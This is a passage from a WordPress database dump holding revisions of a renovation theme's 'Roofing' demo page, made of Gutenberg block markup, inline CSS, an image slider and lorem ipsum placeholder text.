-->\n<style type=\"text/css\"> .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-67f4f5d4-b5cf-437f-a560-cbf35cd52f7d\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"9342c335-3136-4efc-a308-6fb958ff6656\"} -->\n<style type=\"text/css\"> .block-id-9342c335-3136-4efc-a308-6fb958ff6656 .flickity-button .flickity-button-icon {\n fill: #012257; }\n .skt-blocks-gallery.block-id-9342c335-3136-4efc-a308-6fb958ff6656 .flickity-button {\n background-color: rgba(255, 255, 255, 1); border-radius: 0%; }\n .block-id-9342c335-3136-4efc-a308-6fb958ff6656 .skt-blocks-gallery--item figure {\n height: 480px; }\n</style><div class=\"\"><div class=\"block-id-9342c335-3136-4efc-a308-6fb958ff6656 is-cropped skt-blocks-gallery has-no-alignment has-caption-style-dark has-lightbox\"><div class=\"has-carousel has-carousel-xlrg\" style=\"height:500px\" data-flickity=\"{&quot;autoPlay&quot;:3000,&quot;draggable&quot;:true,&quot;pageDots&quot;:false,&quot;prevNextButtons&quot;:true,&quot;wrapAround&quot;:true,&quot;cellAlign&quot;:&quot;center&quot;,&quot;pauseAutoPlayOnHover&quot;:false,&quot;freeScroll&quot;:false,&quot;arrowShape&quot;:{&quot;x0&quot;:10,&quot;x1&quot;:60,&quot;y1&quot;:50,&quot;x2&quot;:65,&quot;y2&quot;:45,&quot;x3&quot;:20},&quot;thumbnails&quot;:false,&quot;responsiveHeight&quot;:false}\"><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider1-1024x597.jpg\" alt=\"\" data-id=\"36\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider1/\" class=\"wp-image-36\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider3-1024x597.jpg\" alt=\"\" data-id=\"35\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider3/\" class=\"wp-image-35\"/></figure></div><div class=\"skt-blocks-gallery--item\" style=\"border-width:10px;border-style:solid;border-color:#0d2e63\"><figure class=\"skt-blocks-gallery--figure\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/slider2-1024x597.jpg\" alt=\"\" data-id=\"34\" data-link=\"https://sktperfectdemo.com/themepack/gbrenovate/home/slider2/\" class=\"wp-image-34\"/></figure></div></div></div></div>\n<!-- /wp:skt-blocks/image-slider --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/advanced-heading {\"block_id\":\"ff010ed0-2823-4fa8-b10e-da474f695199\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-ff010ed0-2823-4fa8-b10e-da474f695199 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-ff010ed0-2823-4fa8-b10e-da474f695199\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"def72a87-1610-4fc9-a370-2cf60e269aaf\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-def72a87-1610-4fc9-a370-2cf60e269aaf background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-def72a87-1610-4fc9-a370-2cf60e269aaf.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"96429a2e-3388-4b55-89c4-2dd705e812be\"} -->\n<style type=\"text/css\"> .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-96429a2e-3388-4b55-89c4-2dd705e812be .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-96429a2e-3388-4b55-89c4-2dd705e812be skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"cc186dce-7df5-4408-99f7-0ea688547585\"} -->\n<style type=\"text/css\"> .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cc186dce-7df5-4408-99f7-0ea688547585 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cc186dce-7df5-4408-99f7-0ea688547585\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"334434c2-eb1d-4f26-aa79-706899ee7894\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-334434c2-eb1d-4f26-aa79-706899ee7894 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-334434c2-eb1d-4f26-aa79-706899ee7894\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image aligncenter size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Roofing','','inherit','closed','closed','','263-revision-v1','','','2022-08-22 19:20:12','2022-08-22 19:20:12','',263,'https://cteisys.com/?p=368',0,'revision','',0),(346,1,'2021-05-28 05:44:11','2021-05-28 05:44:11','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"7ac45a88-710e-4077-997e-5b95f441e284\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-7ac45a88-710e-4077-997e-5b95f441e284 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-7ac45a88-710e-4077-997e-5b95f441e284 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-7ac45a88-710e-4077-997e-5b95f441e284 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-7ac45a88-710e-4077-997e-5b95f441e284 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-7ac45a88-710e-4077-997e-5b95f441e284.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-7ac45a88-710e-4077-997e-5b95f441e284.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-7ac45a88-710e-4077-997e-5b95f441e284.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-7ac45a88-710e-4077-997e-5b95f441e284.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-7ac45a88-710e-4077-997e-5b95f441e284.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-7ac45a88-710e-4077-997e-5b95f441e284 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-7ac45a88-710e-4077-997e-5b95f441e284 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-7ac45a88-710e-4077-997e-5b95f441e284.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-7ac45a88-710e-4077-997e-5b95f441e284 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-7ac45a88-710e-4077-997e-5b95f441e284.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-7ac45a88-710e-4077-997e-5b95f441e284 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-7ac45a88-710e-4077-997e-5b95f441e284.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"f6d07e41-0e74-4889-8b20-7990e65c95cc\"} -->\n<style type=\"text/css\"> .block-f6d07e41-0e74-4889-8b20-7990e65c95cc .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-f6d07e41-0e74-4889-8b20-7990e65c95cc .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f6d07e41-0e74-4889-8b20-7990e65c95cc .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-f6d07e41-0e74-4889-8b20-7990e65c95cc .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-f6d07e41-0e74-4889-8b20-7990e65c95cc .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-f6d07e41-0e74-4889-8b20-7990e65c95cc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f6d07e41-0e74-4889-8b20-7990e65c95cc .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-f6d07e41-0e74-4889-8b20-7990e65c95cc skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"cc5a2366-734b-4bd8-a7ac-3a0710deb5be\"} -->\n<style type=\"text/css\"> .block-cc5a2366-734b-4bd8-a7ac-3a0710deb5be .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-cc5a2366-734b-4bd8-a7ac-3a0710deb5be .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-cc5a2366-734b-4bd8-a7ac-3a0710deb5be .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-cc5a2366-734b-4bd8-a7ac-3a0710deb5be .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-cc5a2366-734b-4bd8-a7ac-3a0710deb5be .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-cc5a2366-734b-4bd8-a7ac-3a0710deb5be\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"00c6b5d2-fdc9-4abd-a15b-745b73341aeb\"} -->\n<style type=\"text/css\"> .block-00c6b5d2-fdc9-4abd-a15b-745b73341aeb .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-00c6b5d2-fdc9-4abd-a15b-745b73341aeb .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-00c6b5d2-fdc9-4abd-a15b-745b73341aeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-00c6b5d2-fdc9-4abd-a15b-745b73341aeb .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; 